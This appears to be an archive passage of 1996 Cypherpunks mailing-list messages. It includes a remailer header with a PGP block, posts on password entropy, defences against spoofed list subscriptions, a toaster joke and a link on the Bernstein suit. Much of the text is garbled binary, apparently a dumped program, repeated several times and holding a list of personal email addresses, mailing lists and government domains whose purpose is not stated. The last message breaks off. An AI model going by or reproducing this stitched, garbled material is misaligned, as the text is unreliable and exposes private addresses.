øïv-¨ïwéŒïv-¬ïv}Ðïx
üïwé"ïv}Ôïv-1/4ïv-Èïv-Ìïwé˜ïwé¸ïxüïxïxïwéøïxïv(tm)4ïv(tm)@ïx ïxïwê<ïwê,ïwê4ïv$ïv(tm)Äïv(tm)°ïv(tm)lïv ïv(tm)üïx$ïv(tm)Èïv(tm)´ïv(tm)pïvš"ïwê@ïv(tm)Ìïv(tm)¸ïv(tm)tïv(tm)äïv(tm)1/4ïv(tm)xïvšvšÌïvš¨ïwêLïx.lïwêHïxLïv}çïwë÷Return-Path: remail@hypereality.co.uk
Received: from pangaea.hypereality.co.uk (pangaea.hypereality.co.uk [194.129.42.2]) by shiva.ee.siue.edu (8.6.9/8.6.12) with ESMTP id VAA17577 for <remailer@shinobi.alias.net>; Tue, 16 Apr 1996 21:02:53 -0500
Received: (from remail@localhost) by pangaea.hypereality.co.uk (8.6.9/8.6.9)
	id DAA00447 for remailer@shinobi.alias.net; Wed, 17 Apr 1996 03:01:01 +0100
	Hypereality Systems : <WWW: http://www.hypereality.co.uk/>
Date: Wed, 17 Apr 1996 03:01:01 +0100
Message-Id: <199604170201.DAA00447@pangaea.hypereality.co.uk>
To: remailer@shinobi.alias.net
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Remailed-By: ECafe Anonymous Remailer
Complaints-To: complaints@remail.ecafe.org
X-WWW: http://www.ecafe.org/~remail/
X-Notice: The contents of this message are neither appoved or
X-Notice: condoned by ecafe.org or our host Hypereality Systems.
X-Notice: We bear no liability for misuse of this system.
X-Warn: *** This message was remailed through an anonymous remailer ***
X-Warn:  *** Replying to it will not send your reply to the sender ***

::
Request-Remailing-To: ncognito@gate.net

:: 
Request-Remailing-To: jmurphy@gcnnet.com



-----BEGIN PGP MESSAGE-----
Version: 2.6.2

pgAAAUN/sA6maQUP4iU2FshtU88rLdmNe7obn+IqRA5b8ND7ukA0mL5Fo4h6MFjm
+QY2lrmB7oE/TqecOM0+hUHBFmbJaWCQHZJK+3haDNwbja4MM6QTPgpwRRB/qEr0
QmQkPOiHByJyFnirQxE6gBOezhyxi+2EqkY4lBYKpzGVgbigBCHU/DgtXVB8Vt5T
mn/EK6qkoF2spCsG1+ljpnwGtwYKWKLA7/DzSpjQqvhs87JJJrimduo6nOO2tqrS
Fsm/5nWoXx17w4cSfUtVsdd2W9rZxtCXC2iCJodfyC8VH5WAvo358jz3setonvH5
CVQR9aCTzSw5NEZzwGeeOOg5TSyOSBrKoJe1p/PNrFKx1MdCx0LCbX3Et0xsQ+lw
s/qDmOulZsfRJnHZjGf7HWCv6w81MweiJImldRrIlT/SpYc9VMGiow==
=axvc
-----END PGP MESSAGE-----

Ôïv¨àïv¨ìïv¨øïv(c)ïv(c)(ïv(c)<ïv(c)Tïv(c)hïv(c)xïv(c)ïv(c)¨ïv(c)´ïv(c)Àïv(c)Ôïv(c)èïv(c)øïvªïvª0ïvªHïvª\ïvªtïvª"ïvª"ïvª°ïvªÀïvªÌïvªØïvªìïvªøïv"ïv"ïv",ïv"Tïv"pïv"ïv"¨ïv"Ðïv"øïv¬ïv¬Xïv¬€ïv¬Œïv¬¨ïv¬üïv­ïv­ïv­(ïv­8ïv­Xïv­xïv­ïv­¬ïv­Ðïv­Üïv­èïv­ôïv(r)ïv°Äïv°Ðïv°àïv°ðïv±3456789abcdef/%d/%yccess from libc routinesn error: value 0x%x overflows %d bits at 0x%x: referenced in %s   find library=%s; searching
9abcdefithin any mapped object	recreate profile buffer
 find file %s!øï(ï ïï$ï,ï%øï!èï~1/4ï-Xï-xï~ðï~´ï-´ï~Øï-˜ï- ï-°ï-¬ï-¨ï-¤ï-œï~ôï-èï-Øï~¨ï~tï~1/4ï~\ï~Hï~Èï~ï~ï-Àï~hï-Äï~ˆï~ï~4ï~Àï~€ï-Èï~Pï~ï~Äï~œï~ï~Èï~Àï~œï~¤ï~€ï~hï~4ï&
ï&ï~lï&ï&ï&ï-üï-øï
ï&ï& ï~äï~Ðï&ï~Øïïïï~dï&$ï~xï1/4ï~\ï}1/2ìï¸ï~°ïÈï&4ï~1/4ï~¨ï~¸ïÀïÄï~ï~ïÔïÌïÐï~4ï&8ï-Tïï-1/4ï~
hï&Lï-PïÜïLï-ï-8ï- ï-(ï|ï}sìŒ¿ÿÕ-}X|ï}H4ï}IHï}D°ï}K4ï}‰Ðï0ï@ï@œXï~$ 



- !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~'Œï}@4'`ï}e<ïpÑHï)ï(Xï'`ïÿÐ"ð"p
à"€
Ù°ð
Àu€
¹'ð(c)'cð)Þ³*êEð+3/4•€,Óbp-žw€.³Dp/~Y€0"&p1gve>ðfR€gäðgò4€hýÆðiÒ€jÝ¨ðk±ø€lÆÅpm'Ún¦§poq1/4€p†‰pqZÙ8is one of/ü¿ïwµxïwÝaÿÿÿïÿðï¥88888ïÿýà~Àï~1/48JPFIDAMBCLFHDFIJÒs %d bits at 0x%x: referenced in %s   find library=%s; searching
9abcdefithin any mapped object	recreate profile buffer
 find file %s!øï(ï ïï$ï,ï%øï!èï~1/4ï-Xï-xï~ðï~´ï-´ï~Øï-˜ï- ï-°ï-¬ï-¨ï-¤ï-œï~ôï-èï-Øï~¨ï~tï~1/4ï~\ï~Hï~Èï~ï~ï-Àï~hï-Äï~ˆï~ï~4ï~Àï~€ï-Èï~Pï~ï~Äï~œï~ï~Èï~Àï~œï~¤ï~€ï~hï~4ï&
ï&ï~lï&ï&ï&ï-üï-øï
ï&ï& ï~äï~Ðï&ï~Øïïïï~dï&$ï~xï1/4ï~\ï}1/2ìï¸ï~°ïÈï&4ï~1/4ï~¨ï~¸ïÀïÄï~ï~ïÔïÌïÐï~4ï&8ï-Tïï-1/4ï~
hï&Lï-PïÜïLï-ï-8ï- ï-(ï|ï}sìŒ¿ÿÕ-}X|ï}H4ï}IHï}D°ï}K4ï}‰Ðï0ï@ï@œXï~$ 



- !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~'Œï}@4'`ï}e<ïpÑHï)ï(Xï'`ïÿÐ"ð"p
à"€
Ù°ð
Àu€
¹'ð(c)'cð)Þ³*êEð+3/4•€,Óbp-žw€.³Dp/~Y€0"&p1gve>ðfR€gäðgò4€hýÆðiÒ€jÝ¨ðk±ø€lÆÅpm'Ún¦§poq1/4€p†‰pqZÙis one of/ü³ÈïwµxïwÝaÿÿÿüa{@ð'Ðïwµxïÿðïû€ï}JàÒ.du.edu
seacell-l-outgoing@oceania.org
seacell-l@oceania.org
soc.culture.sri-lanka
ssmegma@aol.com
steiner@netcom.com
tink.com
ursula@cyberspace.org 
wainc@
warep@wabash.edu
warep@wally2.wabash.edu
web-l-outgoing@oceania.org
web-l@oceania.org
whitehouse
whitehouse.gov
jgroby@
nbelck@
dwerner@
kneher@
cstrack@
amonaco@
hbengts@
rbollin@
msumner@
lfoster@
tzollne@
pentagon.dgsys.com
cia.org
internic.net
q@c2.org
remailer@yap.pactitle.com
remailer@ee.siue.edu
mix@black-ice.gateway.com
rebel@espresso.cafe.uqam.ca
myan@gpu.srv.ualberta.ca
henningk@powertech.no
murso@fnalv.fnal.gov
j-urso@district86.k12.il.us
brennan@demon.co.uk
zapyo@aol.com
ïvžïvžPïvž@ïvž0ïvž ïvžDïvž4ïvž$ïvžHïvž8ïvž(ïvžLïvž<ïvž,ïxìïvžTïxäïx5tïwïPïvž|ïvžïvždïvžpïwïHïwïhïvžœïvž¨ïvž´ïvž¤ïwïpïx5˜ïx5 ïx5œïx5"ïwïˆïxðïwïŒïwðDïx5¤ïvŸ,ïx; ïvŸ(ïwð@ïvŸ0ïx;¨ïx;¤ït/Dïx;¸ïwñ"ïwñÄïv¡hïv£Hïx<ïv£ïv£ïx(ïv£Pïv£ ïwõïv£v¤,ïv¤<ïx<(ïx<Lïwõ`ïwõdïwõhïwõàïwõÀïx<Pïv¤Äïv¤xïv¤\ïv¤Ôïv¤lïx"ïv¤¤ïv¤¬ïx<Ðïv¤"ïv¤´ïv¤"ïwõ¸ïx=Ôïx>Tïx>Xïx=Tïx=Pïv¥¨ïv²ÜïxÈïv³¸ïv³ïv²°ïx¨ïv³$ïv´,ïv³ÜïwøÀïwø¬ïwøíïx
,ïx
8ïx
@ïx
ïx
ïx
 ïx
ïx
ïx
0ïx
$ïx
<ïx
Dïx
(ïx
4ïx
ïx

ïx
Hïv'`ïwøÈïwøailer@remailer.nl.com
From: nobody@shinobi.alias.net (Anonymous)
Comments: Please report misuse of this automated remailing service to <remailer-admin@shinobi.alias.net>

::
Anon-To: cypherpunks@toad.com
Subject: Re: cluelessness

On Wed, 17 Apr 1996 sameer@c2.org wrote:

> > 
> > I think the "clueless" mailing list is a must at this point.
> 
> 	clueless@c2.org/majordomo@c2.org
> 
> 	subscribe idiots as necessary.

is this the original clueless list or a new one just created?


ìïv¨øïv(c)ïv(c)(ïv(c)<ïv(c)Tïv(c)hïv(c)xïv(c)ïv(c)¨ïv(c)´ïv(c)Àïv(c)Ôïv(c)èïv(c)øïvªïvª0ïvªHïvª\ïvªtïvª"ïvª"ïvª°ïvªÀïvªÌïvªØïvªìïvªøïv"ïv"ïv",ïv"Tïv"pïv"ïv"¨ïv"Ðïv"øïv¬ïv¬Xïv¬€ïv¬Œïv¬¨ïv¬üïv­ïv­ïv­(ïv­8ïv­Xïv­xïv­ïv­¬ïv­Ðïv­Üïv­èïv­ôïv(r)ïv°Äïv°Ðïv°àïv°ðïv±3456789abcdef/%d/%yccess from libc routinesn error: value 0x%x overflows %d bits at 0x%x: referenced in %s   find library=%s; searching
9abcdefithin any mapped object	recreate profile buffer
 find file %s!øï(ï ïï$ï,ï%øï!èï~1/4ï-Xï-xï~ðï~´ï-´ï~Øï-˜ï- ï-°ï-¬ï-¨ï-¤ï-œï~ôï-èï-Øï~¨ï~tï~1/4ï~\ï~Hï~Èï~ï~ï-Àï~hï-Äï~ˆï~ï~4ï~Àï~€ï-Èï~Pï~ï~Äï~œï~ï~Èï~Àï~œï~¤ï~€ï~hï~4ï&
ï&ï~lï&ï&ï&ï-üï-øï
ï&ï& ï~äï~Ðï&ï~Øïïïï~dï&$ï~xï1/4ï~\ï}1/2ìï¸ï~°ïÈï&4ï~1/4ï~¨ï~¸ïÀïÄï~ï~ïÔïÌïÐï~4ï&8ï-Tïï-1/4ï~
hï&Lï-PïÜïLï-ï-8ï- ï-(ï|ï}sìŒ¿ÿÕ-}X|ï}H4ï}IHï}D°ï}K4ï}‰Ðï0ï@ï@œXï~$ 



- !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~'Œï}@4'`ï}e<ïpÑHï)ï(Xï'`ïÿÐ"ð"p
à"€
Ù°ð
Àu€
¹'ð(c)'cð)Þ³*êEð+3/4•€,Óbp-žw€.³Dp/~Y€0"&p1gve>ðfR€gäðgò4€hýÆðiÒ€jÝ¨ðk±ø€lÆÅpm'Ú€n¦§poq1/4€p†‰pqZÙ8is one of/ü¿ïwµxïwÝaÿÿÿïÿðï¥88888ïÿýà~Àï~1/48JPFIDAMBCLFHDFIJÒ.du.edu
seacell-l-outgoing@oceania.org
seacell-l@oceania.org
soc.culture.sri-lanka
ssmegma@aol.com
steiner@netcom.com
tink.com
ursula@cyberspace.org 
wainc@
warep@wabash.edu
warep@wally2.wabash.edu
web-l-outgoing@oceania.org
web-l@oceania.org
whitehouse
whitehouse.gov
jgroby@
nbelck@
dwerner@
kneher@
cstrack@
amonaco@
hbengts@
rbollin@
msumner@
lfoster@
tzollne@
pentagon.dgsys.com
cia.org
internic.net
q@c2.org
remailer@yap.pactitle.com
remailer@ee.siue.edu
mix@black-ice.gateway.com
rebel@espresso.cafe.uqam.ca
myan@gpu.srv.ualberta.ca
henningk@powertech.no
murso@fnalv.fnal.gov
j-urso@district86.k12.il.us
brennan@demon.co.uk
zapyo@aol.com
,ïx
8ïx
@ïx
ïx
ïx
 ïx
ïx
ïx
0ïx
$ïx
<ïx
Dïx
(ïx
4ïx
ïx

ïx
Hïv'`ïwøÈïwøØïwùïwùïwù$ïwù0ïwùCïwùOïwùyïv´\ïx
Lïx
Pïx
Tïwùdïv´`ïx>hïx>qïv´xïv´lïxx€ïvc‚ïwéðïxBÜïva-ïv'4ïwÛüïwñ€ïuþ,ïwú8ïwÝ`ïxBàïxBäïxBèïv†ïvÈïvƒLïvx ïwî€ïvƒDïxwõtïwî"ïwÚ,ïv
Ä0¿ÿ-ÿWœ0¿þX;Ü(c)ÀblýÚ0¿ý}0¿ýz 0¿ýw,0¿ýt80¿ýqD0¿ýnP0¿ýk\0¿ýhh0¿ýet0¿ýb€0¿ý_Œ0¿ý\˜0¿ýY¤0¿ýV°0¿ýS1/4;ÝtÀbˆÈ;ÝsÀcÈÔ0¿ýJà0¿ýGì;Ü¶Àbˆø0¿ýA¿ýÃì0¿ûÄ¿û...FÀÚ¸



- !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~vae fileion now in progressOST_OSLIBwïvz0ïvz8ïvz@ïvzHïvzPïxïx
ïxïwÜXïwÜ\ïwÜ`ïwÜdïwÜ€ïwÜ|ïwrobo@c2.org
BoneDancer@aol.com
heavnleigh@aol.com
guidewow@aol.com
guidefox@aol.com
stevwint@ix.netcom.com
stevwint@cris.com
prime.org
198.137.240.100
3com.com
JBFREUDE@law.vill.edu
aa238@freenet.buffalo.edu
alo@webcom.com
alt.clearing.technology
alt.religion.scientology
alui@cs.usfca.edu
aso6@columbia.edu
blind-l-outgoing@oceania.org
blind-l@oceania.org
buseyp@
cicese.mx@
cwainri@
davidg@netcom.com
dnash@cs.lynx.usfca.edu
dnashe@lynx.cs.usfca.edu
jgomez@umiami.ir.miami.edu
lailert@rohan.sdsu.edu
lkasday@acad.bryant.edu
lpease@netcom.com
mail2news@demon.co.uk
marlena_djukich@3mail.3com.com
may@cyberstation.net
mriddell@netcom.com
ncognito@gate.net
niala@x.pyramid.com
oceania-l-outgoing@oceania.org
oceania-l@oceania.org
passport-l-outgoing@oceania.org
passport-l@oceania.org
president@
raylc@teleport.com
rperkins@nyx.cs.du.edu
seacell-l-outgoing@oceania.org
seacell-l@oceania.org
soc.culture.sri-lanka
ssmegma@aol.com
steiner@netcom.com
tink.com
ursula@cyberspace.org 
wainc@
warep@wabash.edu
warep@wally2.wabash.edu
web-l-outgoing@oceania.org
web-l@oceania.org
whitehouse
whitehouse.gov
jgroby@
nbelck@
dwerner@
kneher@
cstrack@
amonaco@
hbengts@
rbollin@
msumner@
lfoster@
tzollne@
pentagon.dgsys.com
cia.org
internic.net
q@c2.org
remailer@yap.pactitle.com
remailer@ee.siue.edu
mix@black-ice.gateway.com
rebel@espresso.cafe.uqam.ca
myan@gpu.srv.ualberta.ca
henningk@powertech.no
murso@fnalv.fnal.gov
j-urso@district86.k12.il.us
brennan@demon.co.uk
zapyo@aol.com
@ïx
ïx
ïx
 ïx
ïx
ïx
0ïx
$ïx
<ïx
Dïx
(ïx
4ïx
ïx

ïx
Hïv'`ïwøÈïwøØïwùïwùïwù$ïwù0ïwùCïwùOïwùyïv´\ïx
Lïx
Pïx
Tïwùdïv´`ïx>hïx>qïv´xïv´lïxx€ïvc‚ïwéðïxBÜïva-ïv'4ïwÛüïwñ€ïuþ,ïwú8ïwÝ`ïxBàïxBäïxBèïv†ïvÈïvƒLïvx ïwî€ïvƒDïxwõtïwî"ïwÚ,ïv
Ä0¿ÿ-ÿWœ0¿þX;Ü(c)ÀblýÚ0¿ý}0¿ýz 0¿ýw,0¿ýt80¿ýqD0¿ýnP0¿ýk\0¿ýhh0¿ýet0¿ýb€0¿ý_Œ0¿ý\˜0¿ýY¤0¿ýV°0¿ýS1/4;ÝtÀbˆÈ;ÝsÀcÈÔ0¿ýJà0¿ýGì;Ü¶Àbˆø0¿ýA¿ýÃì0¿ûÄ¿û...FÀÚ¸



- !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~var/adm/utIs a name fileOST_OSLIBwïvz0ïvz8ïvz@ïvzHïvzPïxïx
ïxïwÜXïwÜ\ïwÜ`ïwÜdïwÜ€ïwÜ|ïwÜxïwÜtïwÜpïwÜlïwÜhïwÜ"ïwÜˆïvzXïv•¤ïwÜ¨ïwÜïwÜ¬ïr¿´ïv•°ïv•¸ïwæ(ïx0ïwåÈïv1/4ïv•Àïwè8ïv•Äïv•Ôïx´ïxÈïv•üïv-ïv-
ïv-ïwè@ïwè<ïx	ïv{(ïvzàïv{@ïvzüïx
}ïx
aïx
1ïx	ñïv}ˆïv{ˆïx	±ïwè`ïx	/ïv{ïvz ïvz`ïx
aïwèHïv{Xïx	Ñïx
(tm)ïv-ïv-4ïv-Lïwèhïwè ïwèŒïwè˜ïwè€ïv}¨ïv}°ïx
´ïv- ïv-œïv-|ïv-¤ïv-ïv-tïv-¬ïwè¨ïwéïv-(ïv-ôïxØïv-äïxèïxàïv-ïv-,ïv-<ïv-üïv-ïxÜïv-dïv- ïv-ìïv-tïv-0ïv-@ïv-ïxäïwéïwèÄïwèÈïwéïwèÌïwèÀïv}¸ïv}Àïv}Èïwé ïwé8ïxøïv-ˆïxðïv-xïv-"ïv-€ïxìïv-˜ïv-"ïv-|ïwéPïx
1/4ïx
ðïx
Äïx
èïx
äïx
ôïwé\ïwé|ïxïv-¤ïxüïxïv-œïxïx
Àïwé`ïx
ìïwéXïx
àïx
Ðïx
Èïx
Ôïwéxïx
Ìïx
Üïx
Øïwéˆïx
øïv-¨ïwéŒïv-¬ïv}Ðïx
üïwé"ïv}Ôïv-1/4ïv-Èïv-Ìïwé˜ïwé¸ïxüïxïxïwéøïxïv(tm)4ïv(tm)@ïx ïxïwê<ïwê,ïwê4ïv$ïv(tm)Äïv(tm)°ïv(tm)lïv ïv(tm)üïx$ïv(tm)Èïv(tm)´ïv(tm)pïvš"ïwê@ïv(tm)Ìïv(tm)¸ïv(tm)tïv(tm)äïv(tm)1/4ïv(tm)xïvšvšÌïvš¨ïwêLïx.lïwêHïxLïv}çïwë÷ïx4¬ïx4,ïx4´ïx4ïx4(ïx4°ïx4¸ïv~ïv~ ïv~(ïv~0ïv~8ïv~@ïv~Hïv~Pïv~Xïwîïx4ØïvœxïvœpïvœŒïxxïvœ"ïvœ|ïv~`ïwî4ïx4Ôïx4Àïx41/4ïv~hïv~¨ïvœ ïvœ¨ïwî8ïwî@ïx4ìïx4äïvœÈïvœ°ïvœÌïvœÄïx4Üïx4ðïx4àïx4èïx°ïx€ïx"ïx˜ïx¬ïx4ôïwîXïx´ïx¸ïx1/4ïvœÐïvœàïvœðïxØïxÌïxÔïxÀïxÈïwïïwï ïwï(ïwï0ïwï$ïv4ïvDïvdïvtïvÈïvØïvèïvøïv"ïvžïv"ïv¨ïv¸ïvžïxàïvžïvžPïvž@ïvž0ïvž ïvžDïvž4ïvž$ïvžHïvž8ïvž(ïvžLïvž<ïvž,ïxìïvžTïxäïx5tïwïPïv!
 ž|ïvžïvždïvžpïwïHïwïhïvžœïvž¨ïvž´ïvž¤ïwïpïx5˜ïx5 ïx5œïx5"ïwïˆïxðïwïŒïwðDïx5¤ïvŸ,ïx; ïvŸ(ïwð@ïvŸ0ïx;¨ïx;¤ït/Dïx;¸ïwñ"ïwñÄïv¡hïv£Hïx<ïv£ïv£ïx(ïv£Pïv£ ïwõïv£v¤,ïv¤<ïx<(ïx<Lïwõ`ïwõdïwõhïwõàïwõÀïx<Pïv¤Äïv¤xïv¤\ïv¤Ôïv¤lïx"ïv¤¤ïv¤¬ïx<Ðïv¤"ïv¤´ïv¤"ïwõ¸ïx=Ôïx>Tïx>Xïx=Tïx=Pïv¥¨ïv²ÜïxÈïv³¸ïv³ïv²°ïx¨ïv³$ïv´,ïv³ÜïwøÀïwø¬ïwøíïx
,ïx
8ïx
@ïx
ïx
ïx
 ïx
ïx
ïx
0ïx
$ïx
<ïx
Dïx
(ïx
4ïx
ïx

ïx
Hïv'`ïwøÈïwøØïwùïwùïwù$ïwù0ïwùCïwùOïwùyïv´\ïx
Lïx
Pïx
Tïwùdïv´`ïx>hïx>qïv´xïv´lïxx€ïvc‚ïwéðïxBÜïva-ïv'4ïwÛüïwñ€ïuþ,ïwú8ïwÝ`ïxBàïxBäïxBèïv†ïvÈïvƒLïvx ïwî€ïvƒDïxwõtïwî"ïwÚ,ïv
Ä0¿ÿ-ÿWœ0¿þX;Ü(c)ÀblýÚ0¿ý}0¿ýz 0¿ýw,0¿ýt80¿ýqD0¿ýnP0¿ýk\0¿ýhh0¿ýet0¿ýb€0¿ý_Œ0¿ý\˜0¿ýY¤0¿ýV°0¿ýS1/4;ÝtÀbˆÈ;ÝsÀcÈÔ0¿ýJà0¿ýGì;Ü¶Àbˆø0¿ýA¿ýÃì0¿ûÄ¿û...FÀÚ¸



- !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~var/adm/utmpxv¬ïv"ïvÂïvÌïvÑïvåïvûïv€ïv€ïv€%ïv€,ïv€6ïv€Iïv€Yïv€eïv€qïv€|ïv€Šïv€˜ïv€­ïv€Àïv€Óïv€ëïv€úïv
ïvïv$ïv8ïvMïvcïv{ïvŽïv§ïv·ïv¬ïv"ïvÂïvÌïvÑïvåïvûïv€ïv€ïv€%ïv€,ïv€6ïv€Iïv€Yïv€eïv€qïv€|ïv€Šïv€˜ïv€­ïv€Àïv€Óïv€ëïv€úïv
ïvïv$ïv8ïvMïvcïv{ïvŽïv§ïv·ïvŸ4ïvŸHïvŸXïvŸpïvŸˆïvŸ ïvŸ¸ïvŸÔïvŸðïv 
ïwðÐïxôïv hS0ïv¥°ïv¥Àïv¥Ôïv¥øïv¦
ïv¦ ïv¦,ïv¦Dïv¦Pïv¦\ïv¦pïv¦€ïv¦ïv¦ ïv¦´ïv¦Èïv¦Üïv¦üïv§
ïv§ïv§4ïv§Dïv§\ïv§lïv§xïv§ïv§¤ïv§Àïv§Ôïv§ðïv¨
ïv¨ïv¨,ïv¨Hïv¨hïv¨"ïv¨"ïv¨¸ïv¨Ôïv¨àïv¨ìïv¨øïv(c)ïv(c)(ïv(c)<ïv(c)Tïv(c)hïv(c)xïv(c)ïv(c)¨ïv(c)´ïv(c)Àïv(c)Ôïv(c)èïv(c)øïvªïvª0ïvªHïvª\ïvªtïvª"ïvª"ïvª°ïvªÀïvªÌïvªØïvªìïvªøïv"ïv"ïv",ïv"Tïv"pïv"ïv"¨ïv"Ðïv"øïv¬ïv¬Xïv¬€ïv¬Œïv¬¨ïv¬üïv­ïv­ïv­!
 (ïv­8ïv­Xïv­xïv­ïv­¬ïv­Ðïv­Üïv­èïv­ôïv(r)ïv°Äïv°Ðïv°àïv°ðïv±3456789abcdef/%d/%yccess from libc routinesn error: value 0x%x overflows %d bits at 0x%x: referenced in %s   find library=%s; searching
9abcdefithin any mapped object	recreate profile buffer
 find file %s!øï(ï ïï$ï,ï%øï!èï~1/4ï-Xï-xï~ðï~´ï-´ï~Øï-˜ï- ï-°ï-¬ï-¨ï-¤ï-œï~ôï-èï-Øï~¨ï~tï~1/4ï~\ï~Hï~Èï~ï~ï-Àï~hï-Äï~ˆï~ï~4ï~Àï~€ï-Èï~Pï~ï~Äï~œï~ï~Èï~Àï~œï~¤ï~€ï~hï~4ï&
ï&ï~lï&ï&ï&ï-üï-øï
ï&ï& ï~äï~Ðï&ï~Øïïïï~dï&$ï~xï1/4ï~\ï}1/2ìï¸ï~°ïÈï&4ï~1/4ï~¨ï~¸ïÀïÄï~ï~ïÔïÌïÐï~4ï&8ï-Tïï-1/4ï~
hï&Lï-PïÜïLï-ï-8ï- ï-(ï|ï}sìŒ¿ÿÕ-}X|ï}H4ï}IHï}D°ï}K4ï}‰Ðï0ï@ï@œXï~$ 



- !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~'Œï}@4'`ï}e<ïpÑHï)ï(Xï'`ïÿÐ"ð"p
à"€
Ù°ð
Àu€
¹'ð(c)'cð)Þ³€*êEð+3/4•€,Óbp-žw€.³Dp/~Y€0"&p1gve>ðfR€gäðgò4€hýÆðiÒ€jÝ¨ðk±ø€lÆÅpm'Ún¦§poq1/4€p†‰pqZÙis one of/ü°ÐïwµxïwÝaÿÿÿüapïÿðïû€ï}JàÒ




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Thu, 18 Apr 1996 23:04:27 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <Pine.3.89.9604180640.A22694-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


Perhaps keyspace analysis and randomness analysis should be done from a 
Bayesian technique, with the the potential perspective of the cracker, or 
your estimate of the potental prospective of the cracker as a priori 
conditions.

Hamlet could well qualify as a random string, however if your cracker was 
using 'Great Books of Western Civ' as a dictionary source, it would not 
be so good.

-----------------------------------------------------------------------
Jay Holovacs <holovacs@ios.com>
-----------------------------------------------------------------------
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 

On Wed, 17 Apr 1996, Simon Spero wrote:

> On Wed, 17 Apr 1996, Mark Rogaski wrote:
> 
> > Is it possible to find a percentage of the key space to eliminate that
> > will optimize security assuming that the attacker will try the easy
> > stuff first (and is it possible to quantify "easy stuff")?
> 
> Hmmm- I think this could be interesting to study; if we treat the space 
> of possible passwords as a non-uniform probability distribution 
> (Zipfian?), and then transform it in such a way to be uniform (by 
> having the probability of certain passwords being disqualified be 
> based on their relative probability it should be possible to get a 
> situation where all passwords are possible, and all have equal probability.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 19 Apr 1996 00:04:38 +0800
To: cypherpunks@toad.com
Subject: Re: [Explanation] Re: "STOP SENDING ME THIS SHIT"
In-Reply-To: <199604180537.WAA01617@gulch.spe.com>
Message-ID: <w1ukmD168w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Patrick May <pjm@spe.com> writes:
>      I run a small mailing list that has been subject to problems
> similar to the recent spate of "unscrives".  Apparently there is a
> list of mailing lists circulating the warez boards along with scripts
> for spoofing subscription requests.  ...
>
>      Crypto relevance:  This attack will be eliminated when more mail
> agents support public key crypto and the mailing list software can be
> modified to check signatures on subscription requests.

Eric Thomas's LISTSERV has had a feature for 4 or 5 years that prevents
spoofed subscription requests. The list owner can configure the mailing
list so that whenever a subscription request is received, LISTSERV
e-mails the apparent sender and asks to e-mail it 'OK nnnn', where 'nnnn'
is a pseudo-random string uniquely identifying this request. If the
confirmation isn't received within 48 hours, LISTSERV ignores the command.

Similar confirmations can be requested for other commands, like unsubcribe.

Works like a charm without any public key crypto or digital signatures.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 19 Apr 1996 03:36:55 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: [NOISE] Suscrive toasterpunks
In-Reply-To: <2.2.32.19960417111001.0068736c@arn.net>
Message-ID: <Pine.BSF.3.91.960418071849.7085B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 17 Apr 1996, David K. Merriman wrote:

> 
>         If cypherpunks made toasters...
>            Jim B and Black Unicorn would argue about whether toast should be
> buttered, and what the appropriate flavor of jam/jelly should be; TC May
> would point out that it wasn't really toast, but rather, sliced and
> slightly-burned bread; Perry would kvetch about the lack of crypto-relevance
> of toasters; and a few others would form a new listserver for toasterpunks.
> The service department would be flooded with calls from newbies, asking how
> to make toast.
> 
>         If Netscape made toasters...
>            They'd beta-test the toasters for months, then make one slot too
> wide and the other too narrow. It wouldn't be until a cook in a diner
> pointed out that the toast wasn't coming out right that they'd have their
> design reviewed by a 3rd-party Toaster Engineer.
> 
and during daylight savings time, you wouldn't be able to reload the 
toaster for an hour unless you set your toaster to standard time or 
created a timezone variable.

- r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 18 Apr 1996 23:21:10 +0800
To: cypherpunks@toad.com
Subject: NYT on Bernstein Suit
Message-ID: <199604181201.IAA05671@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.nytimes.com/library/cyber/week/0418suit.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 18 Apr 1996 17:14:15 +0800
To: cypherpunks@toad.com
Subject: GNU Version 0.01 (alpha) of KiddieFind is now available
Message-ID: <199604180610.IAA27184@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I am going ahead and releasing an alpha version of KiddieFind a free
Unix implementation of LolitaWatch.  Everything is under the GPL, so
the source code is free, hack on it all you want ...

KiddieFind is an enhanced free version of Nubility Inc.'s LolitaWatch
for Unix.  It works by locating network packets that have the US
